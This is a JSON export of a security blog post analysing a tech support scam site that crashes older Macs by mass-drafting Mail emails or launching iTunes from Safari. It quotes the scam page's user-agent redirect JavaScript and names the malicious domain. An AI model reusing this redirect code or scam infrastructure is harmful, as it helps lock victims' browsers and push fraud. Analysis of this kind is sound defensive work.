{"id":5871,"date":"2017-01-18T22:53:20","date_gmt":"2017-01-18T22:53:20","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/18\/news-76\/"},"modified":"2017-01-18T22:53:20","modified_gmt":"2017-01-18T22:53:20","slug":"news-76","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/18\/news-76\/","title":{"rendered":"Tech support scam page triggers denial-of-service attack on Macs"},"content":{"rendered":"

Tech support scammers have been using various themes to push\u00a0fake alerts to scare users into calling for assistance. These fall into the ‘browlock’ category if they are via the browser and into the screen lockers category if they\u00a0are actual malware that runs on the system.<\/p>\n

Recently, there has been a trend for scammers to cause denial-of-service attacks against people’s computers. We documented<\/a> it in early November with a specific HTML5 API (history.pushState<\/em>) which caused the browser to freeze. Today we take a quick look at yet another technique that targets Mac OS users running Safari.<\/p>\n

A newly registered scam website targeting Mac users was making the rounds late last year<\/a>. Simply visiting the malicious site on an older version of MacOS would\u00a0start creating a series of email drafts, which eventually cause the machine to run out of memory and freeze.<\/p>\n

\"emailclient\"<\/p>\n

The malicious webpage will first determine the version of OS X via a user agent check and push two different versions of this denial-of-service (10 or 11):<\/p>\n

if ((navigator.userAgent.match(\/OS 10.1.1\/i))) {   location.replace(\"http:\/\/safari-get.com\/11.php\");  }  else if ((navigator.userAgent.match(\/OS 10.2\/i))) {   location.replace(\"http:\/\/safari-get.com\/11.php\");  }else  {  location.replace(\"http:\/\/safari-get.com\/10.html\");}<\/pre>\n
The first variant\u00a0(10.html<\/em>) has\u00a0code that will keep drafting emails (but does not actually send them) incrementally and cover the previous open windows.<\/p>\n
\"code\"<\/p>\n
The second variant (11.php<\/em>) will instead open up iTunes:<\/p>\n
\"itunes\"<\/p>\n
These flaws may have been fixed with\u00a0macOS Sierra 10.12.2<\/a> as Mac users running a fully up-to-date OS do not seem\u00a0to be affected by\u00a0the Mail app DoS:<\/p>\n
\"blocked\"<\/p>\n
However, the second variant appears to\u00a0still be capable of opening up iTunes, without any prompt in Safari:<\/p>\n
\"launched\"<\/p>\n
Thanks to\u00a0@TheWack0lian<\/a> for pinging me back about this scam site and its DoS feature.<\/p>\n
IOCs:<\/strong><\/span><\/p>\n